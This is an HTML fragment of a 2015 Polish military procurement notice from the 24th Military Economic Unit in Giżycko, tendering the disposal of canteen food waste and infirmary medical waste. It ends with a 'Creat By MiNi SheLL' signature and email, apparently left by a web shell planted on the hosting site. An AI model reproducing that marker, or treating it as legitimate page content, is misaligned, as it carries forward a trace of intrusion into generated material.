<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy podpisany na każdej stronie (załącznik nr 1do siwz). Zestawienie cenowe przedmiotu zamówienia (załącznik nr 1A i /lub/ 1B do siwz) Pełnomocnictwo złożone w formie oryginału lub kopii poświadczonej notarialnie.
- W przypadku podpisywania oferty przez osoby nie wymienione 
w odpisie z właściwego rejestru - pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy
- W przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu
(zgodnie z art. 23 ustawy Pzp). DOWÓD WNIESIENIA WADIUM - dotyczy oferty na zadanie nr 1 - kserokopia dowodu potwierdzona za zgodność z oryginałem przez osobę uprawnioną do reprezentowania Wykonawcy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega możliwość zmiany wysokości zobowiązania wynikającego z oferty Wykonawcy, z którym zawrze umowę w wyniku niniejszego postępowania, w przypadku zmiany stawki podatku od towarów i usług w 2016r. Zmiana zostanie dokonana w formie aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.24wog.wp.mil.pl.,       http://www.bip.mon.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 24 Wojskowy Oddział Gospodarczy w Giżycku, ul. Nowowiejska 20, 11-500 Giżycko, budynek nr 5, pok. 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2015 godzina 08:30, miejsce: 24 Wojskowy Oddział Gospodarczy w Giżycku, ul. Nowowiejska 20, 11-500 Giżycko, budynek nr 5, pok. 108..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1-Odbiór i unieszkodliwianie odpadów pokonsumpcyjnych  kategorii III o kodzie 20 01 08..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odbiór i unieszkodliwienie odpadów pokonsumpcyjnych o kodzie 20 01 08 wg. Rozporządzenia Ministra Środowiska z dnia 29 grudnia 2014r. w sprawie katalogu odpadów (Dz. U. z 2014, poz. 1923) produktów ubocznych pochodzenia zwierzęcego kategorii 3, powstałych w związku z żywieniem żołnierzy w punktach żywienia zbiorowego na terenie administrowanym przez 24 WOG. 
 2. Usługa obejmuje odbiór i utylizację odpadów pokonsumpcyjnych: a. ze stołówki nr 5 na terenie Jednostki Wojskowej Nr 3797 ul. Wojska Polskiego 21, 11 - 500 Giżycko, b.ze stołówki nr 35 na terenie Jednostki Wojskowej Nr 4352 ul. Nowowiejska 20, 11 - 500 Giżycko, c.ze stołówki nr 12 na terenie Jednostki Wojskowej Nr 1460 ul. Wojska Polskiego 23, 12 - 250 Orzysz, d.ze stołówki nr 136 na terenie Jednostki Wojskowej Nr 3797 ul. Wojska Polskiego 23, 12 - 250 Orzysz, e.ze stołówki na terenie Jednostki Wojskowej Nr 2568 ul. Gen. J. Bema  7, 
11-600 Węgorzewo. f.ze stołówki na terenie Jednostki Wojskowej Nr 2098 w Bemowie Piskim  ul. Kętrzyńskiego 1, 12-230 Biała Piska oraz z punktów polowych na terenie poligonu Orzysz .  g.ze stołówki nr 4 na terenie Jednostki Wojskowej Nr 4808 ul. Partyzantów 33, 19 -500 Gołdap.
Ponadto może zaistnieć potrzeba odbierania odpadów pokonsumpcyjnych w przypadku uruchomienia stołówki na terenie Jednostki Wojskowej Nr 1747 w m. Suwałki ul. Wojska Polskiego 21 Ilość odpadów:Pozycja 1	- 8.000 kg, Pozycja 2 	- 8.000 kg, Pozycja 3 	- 60.000 kg, Pozycja 4	- 60.000 kg, Pozycja 5      - 15.000 kg, Pozycja 6      - 250.000 kg, Pozycja 7      - 8.000 kg,  RAZEM:        409.000 kg (409 Mg).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.33.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - odbiór i unieszkodliwienie odpadów medycznych o kodach: 18 01 01, 18 01 02, 18 01 03..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa w zakresie odbioru, transportu i unieszkodliwienie odpadów medycznych o kodach: 
- 18 01 01 - Narzędzia chirurgiczne i zabiegowe oraz ich resztki,- 18 01 02 - Części ciała i organy oraz pojemniki na krew i konserwanty służące do jej przechowywania, - 18 01 03 -  Inne odpady, które zawierają żywe drobnoustroje chorobotwórcze lub ich toksyny oraz inne formy zdolne do  przeniesienia materiału genetycznego, o których wiadomo, lub co do których istnieją wiarygodne podstawy do sądzenia, że wywołują choroby u ludzi i zwierząt z wyłączeniem 18 01 80 i 18 01 82. Zgodnie z Rozporządzeniem Ministra Środowiska z dnia 09 grudnia 2014 r. poz. 1923 w sprawie katalogu odpadów. Odbiór odpadów będzie następował z:
- Ambulatorium JW. 4808, 19-500 Gołdap, ul. Partyzantów 33, tel. 261-336-329,- Ambulatorium JW. 2098 Bemowo Piskie, 12-300 Bała Piska, ul. Kętrzyńskiego 1, 
tel. 261-333-205, - Ambulatorium JW. 2568, 11-600 Węgorzewo, ul. Bema 7, tel.261-337-237, 261-337-172, - Ambulatorium JW. 2909, 11 - 500 Giżycko, ul 1 Maja, tel. 261-335-424. Szacunkowa ilość odpadów przewidzianych do unieszkodliwienia z w/w ambulatoriów - ok. 400 kg w okresie trwania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-2, 90.51.33.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com